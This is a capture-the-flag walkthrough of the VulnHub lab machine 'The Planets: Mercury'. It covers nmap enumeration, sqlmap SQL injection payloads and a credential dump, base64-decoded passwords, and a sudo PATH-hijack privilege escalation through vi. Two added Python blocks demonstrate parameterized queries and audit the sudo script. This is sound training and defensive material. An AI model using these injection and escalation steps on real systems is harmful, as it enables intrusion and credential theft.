[VULNHUB] The Planets:Mercury

Today we are going to hack the Vulnhub machine called The Planets: Mercury. You can download it from the following link: https://www.vulnhub.com/entry/the-planets-mercury,544/
  • Enumeration
    We start with an nmap scan to see which ports are open.
    ~ > nmap -A -p- 192.168.1.116
    Starting Nmap 7.70 ( https://nmap.org ) at 2020-09-07 10:54 CEST
    Nmap scan report for 192.168.1.116
    Host is up (0.00041s latency).
    Not shown: 65533 closed ports
    PORT     STATE SERVICE    VERSION
    22/tcp   open  ssh        OpenSSH 8.2p1 Ubuntu 4ubuntu0.1 (Ubuntu Linux; protocol 2.0)
    8080/tcp open  http-proxy WSGIServer/0.2 CPython/3.8.2
    | fingerprint-strings:
    |   FourOhFourRequest:
    |     HTTP/1.1 404 Not Found
    |     Date: Mon, 07 Sep 2020 08:54:27 GMT
    |     Server: WSGIServer/0.2 CPython/3.8.2
    |     Content-Type: text/html
    |     X-Frame-Options: DENY
    |     Content-Length: 2366
    |     X-Content-Type-Options: nosniff
    |     Referrer-Policy: same-origin
    |   GetRequest, HTTPOptions:
    |     HTTP/1.1 200 OK
    |     Date: Mon, 07 Sep 2020 08:54:27 GMT
    |     Server: WSGIServer/0.2 CPython/3.8.2
    |     Content-Type: text/html; charset=utf-8
    |     X-Frame-Options: DENY
    |     Content-Length: 69
    |     X-Content-Type-Options: nosniff
    |     Referrer-Policy: same-origin
    |     Hello. This site is currently in development please check back later.
    |   RTSPRequest:
    | http-robots.txt: 1 disallowed entry
    |_/
    |_http-server-header: WSGIServer/0.2 CPython/3.8.2
    |_http-title: Site doesn't have a title (text/html; charset=utf-8).
    ----SNIP---
    Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
    Nmap done: 1 IP address (1 host up) scanned in 97.26 seconds
    We see that the SSH port and port 8080 are open. Requesting any page, for example http://192.168.1.116:8080/a, returns this error message:
    Using the URLconf defined in mercury_proj.urls, Django tried these URL patterns, in this order:
        [name='index']
        robots.txt [name='robots']
        mercuryfacts/
    If we visit http://192.168.1.116:8080/mercuryfacts/ we find a page with 2 links. http://192.168.1.116:8080/mercuryfacts/todo contains:
    Add CSS.
    Implement authentication (using users table)
    Use models in django instead of direct mysql call
    All the other stuff, so much!!!
    After looking around the site a bit, it seems likely to be vulnerable to some kind of SQL injection, so we use sqlmap. First we run sqlmap against the URL.
  • Exploitation
    ~ > sqlmap --url http://192.168.1.116:8080/mercuryfacts/
    (sqlmap {1.3.2#stable} banner, http://sqlmap.org)
    ---
    Parameter: #1* (URI)
        Type: error-based
        Title: MySQL >= 5.1 error-based - Parameter replace (UPDATEXML)
        Payload: http://192.168.1.116:8080/mercuryfacts/(UPDATEXML(3651,CONCAT(0x2e,0x71766b7871,(SELECT (ELT(3651=3651,1))),0x7162626a71),2388))
        Type: AND/OR time-based blind
        Title: MySQL >= 5.0.12 time-based blind - Parameter replace
        Payload: http://192.168.1.116:8080/mercuryfacts/(CASE WHEN (9957=9957) THEN SLEEP(5) ELSE 9957 END)
        Type: UNION query
        Title: MySQL UNION query (random number) - 1 column
        Payload: http://192.168.1.116:8080/mercuryfacts/-2065 UNION ALL SELECT CONCAT(0x71766b7871,0x527a5167686d526971676b724d6a6a494c546754526c634479476f746e626b6b55567754664d5953,0x7162626a71)#
    ---
    [15:16:19] [INFO] the back-end DBMS is MySQL
    back-end DBMS: MySQL >= 5.1
    We see that it has found a vulnerable parameter. Next we list the databases.
    ~ > sqlmap --url http://192.168.1.116:8080/mercuryfacts/ --dbs
    (sqlmap {1.3.2#stable} banner, http://sqlmap.org)
    ---
    [15:16:33] [INFO] the back-end DBMS is MySQL
    back-end DBMS: MySQL >= 5.1
    [15:16:33] [INFO] fetching database names
    [15:16:33] [INFO] used SQL query returns 2 entries
    [15:16:33] [INFO] resumed: 'information_schema'
    [15:16:33] [INFO] resumed: 'mercury'
    available databases [2]:
    [*] information_schema
    [*] mercury
    There are 2 databases; we list the tables in the mercury database.
    ~ > sqlmap --url http://192.168.1.116:8080/mercuryfacts/ -D mercury --tables
    (sqlmap {1.3.2#stable} banner, http://sqlmap.org)
    ---
    [15:16:46] [INFO] the back-end DBMS is MySQL
    back-end DBMS: MySQL >= 5.1
    [15:16:46] [INFO] fetching tables for database: 'mercury'
    [15:16:46] [INFO] used SQL query returns 2 entries
    [15:16:46] [INFO] resumed: 'facts'
    [15:16:46] [INFO] resumed: 'users'
    Database: mercury
    [2 tables]
    +-------+
    | facts |
    | users |
    +-------+
    Of the 2 tables, we look at the columns of the users table.
    ~ > sqlmap --url http://192.168.1.116:8080/mercuryfacts/ -D mercury -T users --columns
    (sqlmap {1.3.2#stable} banner, http://sqlmap.org)
    [15:16:59] [INFO] the back-end DBMS is MySQL
    back-end DBMS: MySQL >= 5.1
    [15:16:59] [INFO] fetching columns for table 'users' in database 'mercury'
    [15:16:59] [INFO] used SQL query returns 3 entries
    [15:16:59] [INFO] resumed: 'id','int'
    [15:16:59] [INFO] resumed: 'password','varchar(50)'
    [15:16:59] [INFO] resumed: 'username','varchar(50)'
    Database: mercury
    Table: users
    [3 columns]
    +----------+-------------+
    | Column   | Type        |
    +----------+-------------+
    | id       | int         |
    | password | varchar(50) |
    | username | varchar(50) |
    +----------+-------------+
    Finally, we dump the usernames and passwords.
    ~ > sqlmap --url http://192.168.1.116:8080/mercuryfacts/ -D mercury -T users -C username,password --dump
    (sqlmap {1.3.2#stable} banner, http://sqlmap.org)
    Database: mercury
    Table: users
    [4 entries]
    +-----------+-------------------------------+
    | username  | password                      |
    +-----------+-------------------------------+
    | john      | johnny1987                    |
    | laura     | lovemykids111                 |
    | sam       | lovemybeer111                 |
    | webmaster | mercuryisthesizeof0.056Earths |
    +-----------+-------------------------------+
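    The todo page says the app still uses a "direct mysql call" instead of Django models, and sqlmap's UNION payload shows why that matters: whatever follows /mercuryfacts/ in the URL ends up inside the SQL text. As an added example (not the VM's code, whose view I have not seen, and not part of this walkthrough), the block below reproduces that pattern in Python against an in-memory SQLite stand-in for the mercury database, using the facts/users table names and columns from the sqlmap output with constructed sample rows, and puts the parameterized and type-checked version next to it. The function names fact_vulnerable, fact_bound_only and fact_safe are my own.

```python
"""Added example, not code from the Mercury VM or this walkthrough.
SQLite stands in for MySQL; the schema mirrors the sqlmap output
(facts, users: id/username/password), the rows are constructed."""
import sqlite3

SAMPLE_FACTS = [(1, "Mercury is the smallest planet."),
                (2, "Mercury has no moons.")]
SAMPLE_USERS = [(1, "alice", "sample-pass-1"),   # constructed, not the VM's rows
                (2, "bob", "sample-pass-2")]


def make_db() -> sqlite3.Connection:
    """Build the constructed 'mercury' schema in memory."""
    conn = sqlite3.connect(":memory:")
    conn.executescript(
        "CREATE TABLE facts (id INTEGER, fact TEXT);"
        "CREATE TABLE users (id INTEGER, username TEXT, password TEXT);"
    )
    conn.executemany("INSERT INTO facts VALUES (?, ?)", SAMPLE_FACTS)
    conn.executemany("INSERT INTO users VALUES (?, ?, ?)", SAMPLE_USERS)
    return conn


def fact_vulnerable(conn: sqlite3.Connection, fact_id: str) -> list:
    """The bug: the URL segment is pasted into the SQL text, so a crafted
    segment rewrites the query (this is what sqlmap detected)."""
    sql = f"SELECT fact FROM facts WHERE id = {fact_id}"
    return [row[0] for row in conn.execute(sql)]


def fact_bound_only(conn: sqlite3.Connection, fact_id: str) -> list:
    """Parameter binding alone: the whole segment is one bound value and is
    compared against the integer column; it can never become SQL syntax."""
    sql = "SELECT fact FROM facts WHERE id = ?"
    return [row[0] for row in conn.execute(sql, (fact_id,))]


def fact_safe(conn: sqlite3.Connection, fact_id: str) -> list:
    """Binding plus input validation: reject anything that is not an
    integer before it reaches the database at all."""
    try:
        fid = int(fact_id)
    except ValueError:
        raise ValueError("fact id must be an integer") from None
    sql = "SELECT fact FROM facts WHERE id = ?"
    return [row[0] for row in conn.execute(sql, (fid,))]


# Same shape as sqlmap's one-column UNION payload above (without the hex
# marker strings sqlmap wraps around its result).
UNION_PAYLOAD = "-2065 UNION ALL SELECT username || ':' || password FROM users"


def demo() -> dict:
    """Run the three variants against the payload and a normal id."""
    conn = make_db()
    try:
        validated = fact_safe(conn, UNION_PAYLOAD)
    except ValueError as exc:
        validated = str(exc)
    return {
        "normal": fact_safe(conn, "1"),
        "leaked": fact_vulnerable(conn, UNION_PAYLOAD),
        "bound_only": fact_bound_only(conn, UNION_PAYLOAD),
        "validated": validated,
    }


if __name__ == "__main__":
    for key, value in demo().items():
        print(f"{key}: {value}")
```

    Binding alone is enough to stop the injection; the integer check on top of it gives the view a clean 4xx path for malformed ids instead of an empty result, and is also what Django's own model layer (the todo item "use models") would give for free.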
  • Low Shell
    We now have several usernames and passwords. After trying them, we log in as webmaster!
    ~ > ssh webmaster@192.168.1.116
    webmaster@192.168.1.116's password:
    Welcome to Ubuntu 20.04.1 LTS (GNU/Linux 5.4.0-45-generic x86_64)
     * Documentation:  https://help.ubuntu.com
     * Management:     https://landscape.canonical.com
     * Support:        https://ubuntu.com/advantage
      System information as of Mon 7 Sep 10:26:44 UTC 2020
      System load:             0.01
      Usage of /:              71.7% of 4.86GB
      Memory usage:            29%
      Swap usage:              0%
      Processes:               101
      Users logged in:         0
      IPv4 address for enp0s3: 192.168.1.116
      IPv6 address for enp0s3: 2a01:c50e:21e3:0:a00:27ff:fe89:4adc
    22 updates can be installed immediately.
    0 of these updates are security updates.
    To see these additional updates run: apt list --upgradable
    Last login: Tue Sep 1 13:57:14 2020 from 192.168.31.136
    webmaster@mercury:~$
  • user_flag.txt
    webmaster@mercury:~$ ls
    mercury_proj  user_flag.txt
    webmaster@mercury:~$ cat user_flag.txt
    [user_flag_8339915c9a454657bd60ee58776f4ccd]
    We explore the system and look at which files our user owns.
    webmaster@mercury:~$ find / -user webmaster 2>/dev/null
    /home/webmaster/mercury_proj/mercury_facts/__pycache__/__init__.cpython-38.pyc
    /home/webmaster/mercury_proj/mercury_facts/__pycache__/views.cpython-38.pyc
    /home/webmaster/mercury_proj/mercury_facts/__pycache__/admin.cpython-38.pyc
    /home/webmaster/mercury_proj/mercury_facts/__pycache__/urls.cpython-38.pyc
    /home/webmaster/mercury_proj/notes.txt
    /home/webmaster/.bashrc
    /home/webmaster/.bash_logout
    /home/webmaster/user_flag.txt
    /home/webmaster/.selected_editor
    /home/webmaster/.profile
    /home/webmaster/.cache
    /home/webmaster/.cache/motd.legal-displayed
    /home/webmaster/.bash_history
    There is a file called notes.txt that looks interesting. Let's read it!
    webmaster@mercury:~$ cat /home/webmaster/mercury_proj/notes.txt
    Project accounts (both restricted):
    webmaster for web stuff - webmaster:bWVyY3VyeWlzdGhlc2l6ZW9mMC4wNTZFYXJ0aHMK
    linuxmaster for linux stuff - linuxmaster:bWVyY3VyeW1lYW5kaWFtZXRlcmlzNDg4MGttCg==
    That looks like base64, so we decode the linuxmaster entry.
    webmaster@mercury:~$ echo "bWVyY3VyeW1lYW5kaWFtZXRlcmlzNDg4MGttCg==" | base64 -d
    mercurymeandiameteris4880km
    Now that we have linuxmaster's password, we switch to that user.
    webmaster@mercury:~$ su linuxmaster
    Password:
    linuxmaster@mercury:/home/webmaster$
    As linuxmaster, we check whether we are allowed to use sudo.
  • Privilege Escalation
    linuxmaster@mercury:~$ sudo -l
    [sudo] password for linuxmaster:
    Matching Defaults entries for linuxmaster on mercury:
        env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
    User linuxmaster may run the following commands on mercury:
        (root : root) SETENV: /usr/bin/check_syslog.sh
    We can run one script, check_syslog.sh, as root. We cannot edit it, and its content is:
    linuxmaster@mercury:~$ cat /usr/bin/check_syslog.sh
    #!/bin/bash
    tail -n 10 /var/log/syslog
    It runs tail without the full path, so we can play with our PATH so that it runs a fake "tail" and thereby get a privileged shell. Also note that sudo -l shows SETENV for this entry. For the script to use our $PATH instead of root's we must pass the parameter --preserve-env=PATH; with that, everything should work. With that said, we are going to use "vi" to escalate privileges :)
    linuxmaster@mercury:~$ ln -s /bin/vi tail
    linuxmaster@mercury:~$ export PATH=.:$PATH
    Let's run it!
    linuxmaster@mercury:~$ sudo --preserve-env=PATH /usr/bin/check_syslog.sh
    And vi starts up :) Inside vi, we type:
    !/bin/bash
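    Two things line up to make that escalation possible: the sudoers entry grants SETENV, and the root-run script calls tail by bare name, so the caller's PATH decides which tail runs. As an added example (mine, not the VM's or this walkthrough's), the Python audit below takes the page's sudoers line and script as its input, flags both conditions, and checks a constructed hardened version of the script (tail by absolute path, PATH pinned inside the script) that comes back clean. SHELL_BUILTINS, relative_commands, sets_path and audit are names I chose for this example; the builtin list is deliberately small.

```python
"""Added example, not code from the Mercury VM or this walkthrough:
a small audit for a sudo-granted script, checking for commands looked
up on PATH and for SETENV without a pinned PATH in the script."""
import re
import shlex

# Shell keywords and builtins that are never resolved via PATH
# (deliberately short; extend for real scripts).
SHELL_BUILTINS = {
    "if", "then", "else", "elif", "fi", "for", "do", "done", "while",
    "case", "esac", "export", "set", "unset", "cd", "echo", "exit",
    "return", "local", "read", "test", "[", "shift", "trap", "umask",
}

# The sudoers entry exactly as sudo -l printed it on the page.
SUDO_RULE = "(root : root) SETENV: /usr/bin/check_syslog.sh"

# The script as printed on the page.
SCRIPT_ORIGINAL = """#!/bin/bash
tail -n 10 /var/log/syslog
"""

# Constructed hardened variant: pin PATH inside the script and call tail
# by absolute path, so the caller's environment no longer matters.
SCRIPT_HARDENED = """#!/bin/bash
export PATH=/usr/sbin:/usr/bin:/sbin:/bin
/usr/bin/tail -n 10 /var/log/syslog
"""


def relative_commands(script: str) -> list:
    """Names of external commands the script invokes without an absolute path."""
    found = []
    for line in script.splitlines():
        line = line.strip()
        if not line or line.startswith("#"):
            continue
        # Break pipelines and command lists into their simple commands.
        for segment in re.split(r"\|\|?|&&|;", line):
            try:
                words = shlex.split(segment)
            except ValueError:  # unbalanced quotes etc.: skip the segment
                continue
            # Drop leading VAR=value assignments to reach the command word.
            words = [w for w in words if not re.match(r"^[A-Za-z_]\w*=", w)]
            if not words:
                continue
            cmd = words[0]
            if cmd in SHELL_BUILTINS or cmd.startswith("/"):
                continue
            found.append(cmd)
    return found


def sets_path(script: str) -> bool:
    """True if the script assigns PATH itself (plain or exported)."""
    return re.search(r"^\s*(export\s+)?PATH=", script, re.M) is not None


def audit(rule: str, script: str) -> list:
    """Findings for one sudoers command entry and the script it points at."""
    findings = []
    rel = relative_commands(script)
    if rel:
        findings.append("relative command lookup: " + ", ".join(rel))
    if "SETENV" in rule and not sets_path(script):
        findings.append("SETENV granted and script does not pin PATH")
    return findings


if __name__ == "__main__":
    for label, script in (("original", SCRIPT_ORIGINAL), ("hardened", SCRIPT_HARDENED)):
        print(label, audit(SUDO_RULE, script) or ["no findings"])
```

    The script-side fixes are what the audit checks for; the other half of the fix is on the sudoers side, where the SETENV tag on this entry is what lets the caller carry a PATH across the privilege boundary in the first place and can simply be dropped.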
  • root_flag.txt
    With our root shell, all that is left is to read the flag!
    root@mercury:~# cat root_flag.txt
    @@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
    @@@@@@@@@@@@@@@@@@@/##////////@@@@@@@@@@@@@@@@@@@@
    @@@@@@@@@@@@@@(((/(*(/((((((////////&@@@@@@@@@@@@@
    @@@@@@@@@@@((#(#(###((##//(((/(/(((*((//@@@@@@@@@@
    @@@@@@@@/#(((#((((((/(/,*/(((///////(/*/*/#@@@@@@@
    @@@@@@*((####((///*//(///*(/*//((/(((//**/((&@@@@@
    @@@@@/(/(((##/*((//(#(////(((((/(///(((((///(*@@@@
    @@@@/(//((((#(((((*///*/(/(/(((/((////(/*/*(///@@@
    @@@//**/(/(#(#(##((/(((((/(**//////////((//((*/#@@
    @@@(//(/((((((#((((#*/((///((///((//////(/(/(*(/@@
    @@@((//((((/((((#(/(/((/(/(((((#((((((/(/((/////@@
    @@@(((/(((/##((#((/*///((/((/((##((/(/(/((((((/*@@
    @@@(((/(##/#(((##((/((((((/(##(/##(#((/((((#((*%@@
    @@@@(///(#(((((#(#(((((#(//((#((###((/(((((/(//@@@
    @@@@@(/*/(##(/(###(((#((((/((####/((((///((((/@@@@
    @@@@@@%//((((#############((((/((/(/(*/(((((@@@@@@
    @@@@@@@@%#(((############(##((#((*//(/(*//@@@@@@@@
    @@@@@@@@@@@/(#(####(###/((((((#(///((//(@@@@@@@@@@
    @@@@@@@@@@@@@@@(((###((#(#(((/((///*@@@@@@@@@@@@@@
    @@@@@@@@@@@@@@@@@@@@@@@%#(#%@@@@@@@@@@@@@@@@@@@@@@
    @@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
    Congratulations on completing Mercury!!!
    If you have any feedback please contact me at SirFlash@protonmail.com
    [root_flag_69426d9fda579afbffd9c2d47ca31d90]
  • End
    And with that, we are root on the machine.